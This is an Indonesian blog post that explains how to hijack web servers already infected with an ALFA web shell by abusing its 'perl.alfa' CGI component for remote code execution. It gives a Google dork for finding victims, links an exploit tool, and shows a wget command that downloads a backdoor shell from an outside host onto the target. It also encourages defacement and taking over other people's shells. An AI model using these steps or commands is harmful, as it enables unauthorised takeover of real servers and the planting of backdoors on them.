Remote Code Execution Pada File Perl.alfa
Hallo,
Kembali lagi di Evil Twin - Blog, Oke pada artikel kali ini Saya ingin menulis artikel dengan judul Remote Code Execution Pada File Perl.alfa
Sebenernya Saya heran kenapa banyak Defacer yang menyebut ini sebagai POC RCE (nggak lengkap) pada saat mereka Show Off di Platform media sosial seperti Facebook etc.
Padahal metode ini sekilas sama seperti Nikung shell orang, Cuman bedanya ini pake command aja (kalo kata temen Saya mah ini menikung dengan gaya) wkwk.
Oke langsung aja dah baca artikelnya.
Mencari Target
Seperti yang Saya bilang tadi "Sekilas mirip dengan Dorking shell/Nikung shell", Metode ini juga membutuhkan target yang pastinya bisa didapatkan dengan mudah hanya dengan satu dork dibawah ini:
inurl:/alfacgiapi/ intext:"perl.alfa"
Note : Kembangin biar makin banyak Shell yang ditikung, haha.
Remote Code Execution Pada File Perl.alfa
Setelah mendapatkan target selanjutnya tinggal mengeksekusi targetnya, Disini Saya menggunakan Tools yang dibuat oleh Unknown45.
Link Tools: http://v1.exploits.my.id:1337/?tools=perlalfa
Masukkan command lalu Tap Gaskan, Jika berhasil maka command yang Kalian masukkan tadi berhasil tereksekusi.
Seperti gambar diatas, Disitu Saya mencoba memasukkan command "uname -a && echo "- https://blog.eviltwin.id" dan command tersebut berhasil di eksekusi (target menampilkan kernel & - https://blog.eviltwin.id)
Jika ingin mengupload shell backdoor bisa menggunakan wget, curl etc. Disini Saya coba pakai wget, berikut ini command nya:
wget -O filename.php https://shell.sec666.host/sh3e3e3e3e3e3e3ellll
Outputnya sih "Kagak Vuln Kali Bre wkwk" tapi coba Kita Akses aja shell nya
Ternyata shellnya berhasil terupload, hanya saja tools nya tidak bisa menampilkan outputnya.
Kalo udah diakses shellnya bebas deh mau ngapain aja disitu, Asal writeable haha.
Akhir Kata
Oke mungkin cukup sampai disini aja artikel tentang "Remote Code Execution Pada File Perl.alfa".
Mohon maaf bila ada kesalahan kata dan Sebagainya, Mohon dimaklumi.
Semoga bermanfaat dan Sampai jumpa di artikel selanjutnya!